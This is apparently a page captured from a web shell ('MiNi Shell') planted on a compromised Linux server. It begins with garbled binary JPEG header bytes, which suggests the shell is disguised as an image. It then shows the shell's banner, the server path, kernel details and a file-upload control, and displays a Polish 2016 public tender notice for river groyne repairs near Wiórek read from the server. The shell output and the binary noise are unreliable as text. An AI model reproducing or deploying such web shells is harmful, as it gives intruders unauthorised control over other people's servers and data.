JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160726/157295-N-2016.html

<p class="kh_header"><b>Poznań: Remont ostróg rzeki Warty w km 254+100 do 254+400 w m. Wiórek</b><br>
<b>Numer ogłoszenia: 157295 - 2016; data zamieszczenia: 26.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Zarząd Gospodarki Wodnej , ul. Szewska 1, 61-760 Poznań, woj. wielkopolskie, tel. 061 8567706, faks 061 8525731.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poznan.rzgw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Administracja Rządowa Niezespolona - Gospodarka Wodna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont ostróg rzeki Warty w km 254+100 do 254+400 w m. Wiórek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Remont ostróg rzeki Warty w km 254+100 do 254+400 w m. Wiórek.
1. Cel i zakres opracowania.
Zadanie polega na wykonaniu III etapu remontu zabezpieczenia skarpy prawego brzegu rzeki Warty w zakresie remontu 6 ostróg w km 254+100 do 254+400 wraz z wykonaniem umocnienia skarpy - skrzydełka pomiędzy ostrogami nr Os.4 a Os.6. Remont ma na celu przywrócenie prawidłowej funkcjonalności istniejącym ostrogom, które przeciwdziałają intensywnej erozji bocznej prawego brzegu rzeki w tym miejscu.
2. Lokalizacja zadania.
Przedmiot zadania znajduje się km 254+100 do 254+400 rzeki Warty w m. Wiórek, gmina Mosina, powiat poznański, woj. wielkopolskie, na działkach nr 4/2, 16, 18, 22, 23 obręb Wiórek.
3. Opis stanu istniejącego:
Istniejące ostrogi znajdują się w górnym odcinku rzeki, powyżej wykonanego w roku 2015 zabezpieczenia prawego brzegu. W wyniku zniszczonych ostróg prawy brzeg ulega systematycznej erozji. Nurt rzeki kierowany jest w stronę brzegu prawego wklęsłego co powoduje zabieranie przyległych gruntów. W konsekwencji zagrożona jest droga gruntowa przebiegająca w pobliżu ostróg oraz przyległe tereny.
Remontem jest objętych 6 ostróg:
- Os 2/254,
- Os 4/254,
- Os 6/254,
- Os 8/254,
- Os 10/254,
- Os 12/254.
Podstawowe parametry ostróg :
- szerokość korony - 1,50 m,
- nachylenie skarp korpusu ostrogi 1:1,5 (od W.G. i W.D.),
- nachylenie głowicy faszynady 1: 3,
- nachylenie głowicy po wykonaniu narzutu kamiennego 1:4,
- wrzynki (jak na przekrojach poprzecznych). 
4. Kubatury planowanych do wykonania robót:
Os 2/254 L = 21,0 m:
- Faszynada - 79,69 m3,			 
- Narzut kamienny - 37,84 m3,
- Materac taflowy - 1,0 m x 10,0 m x 16,0 = 160,00 m2,
- Wykop wrzynek - 42,62 m3,		 
- Zasypanie wrzynek - 14,12 m3,
- Plantowanie powierzchni - F=144,00 m2,     
- Obsiew mieszanką traw - F=144,00 m2,
- Rozbiórka narzutu kamiennego - 4,65 m3;
Os 4/254 L = 24,0 m: 
- Faszynada - 107,90 m3,			 
- Narzut kamienny - 47,31 m3,
- Materac taflowy - 1,0 m x 10,0 m x 16,0 = 160,00 m2,
- Wykop wrzynek - 21,84 m3,		 
- Zasypanie wrzynek - 14,64 m3,
- Plantowanie powierzchni - F=70,00 m2,     
- Obsiew mieszanką traw - F=70,00 m2,
- Rozbiórka narzutu kamiennego - 7,44 m3;
Os 6/254 L = 20,0 m: 
- Faszynada - 151,28 m3,			 
- Narzut kamienny - 52,89 m3,
- Materac taflowy - 1,0 m x 6,0 m x 20,0 = 120,00 m2,
- Wykop wrzynek - 41,11 m3,		 
- Zasypanie wrzynek - 9,61 m3,
- Plantowanie powierzchni - F=80,00 m2,     
- Obsiew mieszanką traw - F=80,00 m2,
Os 8/254 L = 18,0 m: 
- Faszynada - 182,80 m3,			 
- Narzut kamienny - 62,59 m3,
- Materac taflowy - 1,0 m x 10,0 m x 18,0 = 180,00 m2,
- Wykop wrzynek - 25,81 m3,		 
- Zasypanie wrzynek - 8,50 m3,
- Plantowanie powierzchni - F=80,00 m2,     
- Obsiew mieszanką traw - F=80,00 m2,
Os 10/254 L = 17,0 m: 
- Faszynada - 121,66 m3,			 
- Narzut kamienny - 51,76 m3,
- Materac taflowy - 1,0 m x 10,0 m x 18,0 = 180,00 m2,
- Wykop wrzynek - 19,40 m3,		 
- Zasypanie wrzynek - 7,48 m3,
- Plantowanie powierzchni - F=40,00 m2,     
- Obsiew mieszanką traw - F=40,00 m2,
Os 12/254 L = 15,0 m: 
- Faszynada - 78,63 m3,			 
- Narzut kamienny - 35,54 m3,
- Materac taflowy - 1,0 m x 6,0 m x 18,0 = 108,00 m2,
- Wykop wrzynek - 19,56 m3,		 
- Zasypanie wrzynek - 6,28 m3,
- Plantowanie powierzchni - F=64,00 m2,     
- Obsiew mieszanką traw - F=64,00 m2.
Ubezpieczenie brzegu - skrzydełko faszynowe z narzutem kamiennym (pomiędzy ostrogami Os4 a Os6:
- Plantowanie skarpy - 300,00m2,
- Materac brzegowy na geowłókninie (kiszki fi 15,0 cm, krata 1,0 x 1,0 F=300,0 m2).
3. Technologia robót i przyjęte rozwiązania techniczne:
Remontowane ostrogi zostaną wypełnione faszyną. Korona budowli, głowica i skarpy ostrogi zabezpieczone będą narzutem kamiennym grubości 0,3 m. Pod ostrogami zaprojektowano materace taflowe, których rozmieszczenie pokazano na planie sytuacyjnym dokumentacji wykonawczej. Pomiędzy przekrojami P-20, a P-21 (ostrogami Os 4/254, a Os 6/254 zabezpieczono skarpę materacem brzegowym grubości 0,3 m zainstalowanym na geowłókninie - kiszki fi 15,00 cm w kratę 1,0 m x 1,0 m), nachylenie skarpy 1:2. W celu prawidłowego wykonania przedmiotu zadania, wykonawca prac jest zobowiązany do przekazania dokumentacji powykonawczej wraz z inwentaryzacją powykonawczą, oraz niezbędnych certyfikatów i deklaracji jakości na wbudowane materiały. Wykonanie remontu ostróg, zaplanowano za pomocą technologii z wody. 
4. Organizacja robót:
Wszystkie prace należy wykonywać zgodnie z projektem wykonawczym, specyfikacją techniczną wykonania i odbioru robót, obowiązującymi normami, warunkami technicznymi, oraz przy zachowaniu przepisów BHP. Prace remontowe powinny być wykonane przez firmę budowlaną posiadająca doświadczenie i stosowną wiedzę w robotach hydrotechnicznych. Zamawiający zaleca dokonanie przez oferenta wizji lokalnej w terenie oraz uzyskanie, wszelkich istotnych informacji, które mogą być konieczne do przygotowania przedmiotowej oferty.
UWAGI DODATKOWE:
1. Zamawiający dopuszcza zastosowanie innych materiałów niż podane w dokumentacji projektowej lub STWiOR pod warunkiem zapewnienia parametrów nie gorszych niż określone w tych dokumentach. W sytuacji zastosowania innych materiałów niż przyjęte w dokumentacji projektowej wykonawca zobowiązany jest do złożenia stosownych dokumentów, uwiarygodniających te materiały na etapie składania oferty przetargowej. W przypadku, gdy zastosowanie tych materiałów wymagać będzie zmiany dokumentacji projektowej, koszty przeprojektowania poniesie wykonawca.
2. Wykonawca zobowiązany jest przed podpisaniem umowy przedłożyć Zamawiającemu celem zatwierdzenia Harmonogram rzeczowo-finansowy.
3. Załączony powyżej opis określa zakres robót przewidziany do realizacji w niniejszym postępowaniu.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamówienia uzupełniające zostaną udzielone na zasadach przewidzianych w art. 67 ust. 1 pkt 6 ustawy</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.24.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować, że wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty, których przedmiotem było wykonanie robót budowlanych (w tym metodą z wody przy każdej z robót) w zakresie regulacji rzek - budowli regulacyjnych lub ubezpieczeń brzegowych (obejmujących wykonanie faszynady, materacy taflowych, narzutu kamiennego) na śródlądowych wodach powierzchniowych o wartości każdej z nich nie mniejszej niż 250 000,00 PLN brutto (w przypadku kontraktów zawieranych w walucie obcej wartość usług podlega przeliczeniu z zastosowaniem średniego kursu waluty obcej podawanego przez Narodowy Bank Polski dla dnia zawarcia umowy). Zamawiający dokona oceny spełnienia warunku na podstawie złożonych przez Wykonawcę dokumentów, oświadczeń wymaganych postanowieniami SIWZ. Oferty będą oceniane wg
zasady spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wskazać, że do realizacji niniejszego zamówienia będzie dysponować odpowiednim sprzętem do realizacji robót z lądu i z wody wraz z informacją o podstawie dysponowania tymi zasobami. Zamawiający wymaga dysponowania następującym sprzętem: koparką gąsienicową na pontonie, holownikiem, krypą (barką). Zamawiający dokona oceny spełnienia warunku na podstawie złożonych przez Wykonawcę dokumentów, oświadczeń wymaganych postanowieniami SIWZ. Oferty będą oceniane wg zasady spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wskazać do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby, w szczególności odpowiedzialne za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nie czynności oraz informacją o podstawie do
dysponowania tymi osobami: 1 osobę posiadającą uprawnienia budowlane do kierowania budową i robotami w specjalności konstrukcyjno-budowlanej lub inżynieryjnej hydrotechnicznej nadane z mocy art. 13 ust. 1, art. 14 ust. 1 pkt 2 i art. 14 ust. 1 pkt. 3d ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2016 r. poz. 290) lub nadane na podstawie przepisów wcześniejszych lub branżowych.
Zamawiający dokona oceny spełnienia warunku na podstawie złożonych przez wykonawcę dokumentów, oświadczeń wymaganych postanowieniami SIWZ. Oferty będą oceniane wg zasady spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że posiada środki finansowe lub zdolność kredytową do realizacji przedmiotowego zadania w wysokości nie mniejszej niż 300 000,00 PLN (lub równowartość tej kwoty w przypadku walut innych niż złoty polski obliczoną przy uwzględnieniu średniego kursu waluty obcej podanego przez Narodowy Bank Polski dla dnia wystawienia informacji potwierdzającej posiadanie zdolności kredytowej). Zamawiający dokona oceny spełnienia warunku na podstawie złożonych przez
Wykonawcę dokumentów, oświadczeń wymaganych postanowieniami SIWZ. Oferty będą oceniane wg zasady spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>2 roboty, których przedmiotem było wykonanie robót budowlanych (w tym metodą z wody przy każdej z robót) w zakresie regulacji rzek - budowli regulacyjnych lub ubezpieczeń brzegowych (obejmujących wykonanie faszynady, materacy taflowych, narzutu kamiennego) na śródlądowych wodach powierzchniowych o wartości każdej z nich nie mniejszej niż 250 000,00 PLN brutto;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz Oferty, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do SIWZ. 2. Pełnomocnictwa osób podpisujących ofertę do reprezentowania firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów. 3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego. 4. Oświadczenie o posiadaniu aktualnego zaświadczenia o przynależności do właściwej izby samorządu zawodowego. 5. Kosztorys ofertowy uproszczony. 6. Oświadczenie dotyczące przynależności do grupy kapitałowej, zgodnie z wzorem stanowiącym Załącznik nr 6 do SIWZ. 7. Pozostałe dokumenty wymienione w pkt 10-11 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy:
- z powodu działania siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
- z powodu wystąpienia warunków hydrologiczno - meteorologicznych uniemożliwiających wykonywanie prac,
- z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa, które nie spowodują zwiększenia zakresu zamówienia,
- z powodu uzasadnionych zmian w zakresie sposobu wykonania umowy proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
- z powodu rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy np. wyniku limitowania posiadanych środków finansowych i konieczności dostosowania wartości wykonywanych zadań do planu wydatków budżetowych. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wykonaniem umowy,
- z powodu zmiany terminów realizacji przedmiotu umowy np. w wyniku limitowania posiadanych środków finansowych i konieczności dostosowania wartości wykonywanych zadań do planu wydatków budżetowych,
- z powodu zmiany obowiązującej stawki VAT, jeżeli zmiana stawki VAT będzie powodowała zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę,
- w przypadku wystąpienia innych okoliczności nieingerujących w treść przedmiotu umowy, których nie można przewidzieć w momencie zawarcia Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poznan.rzgw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Zarząd Gospodarki Wodnej w Poznaniu, ul. Szewska 1, pok. 308, od poniedziałku do piątku, w godz. 8:00 - 15:00 lub pocztą.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2016 godzina 10:00, miejsce: Regionalny Zarząd Gospodarki Wodnej w Poznaniu; ul. Szewska 1, pokój nr 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają wykluczeniu na podstawie art. 24 ust. 1, 2 i 2a Prawa zamówień publicznych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com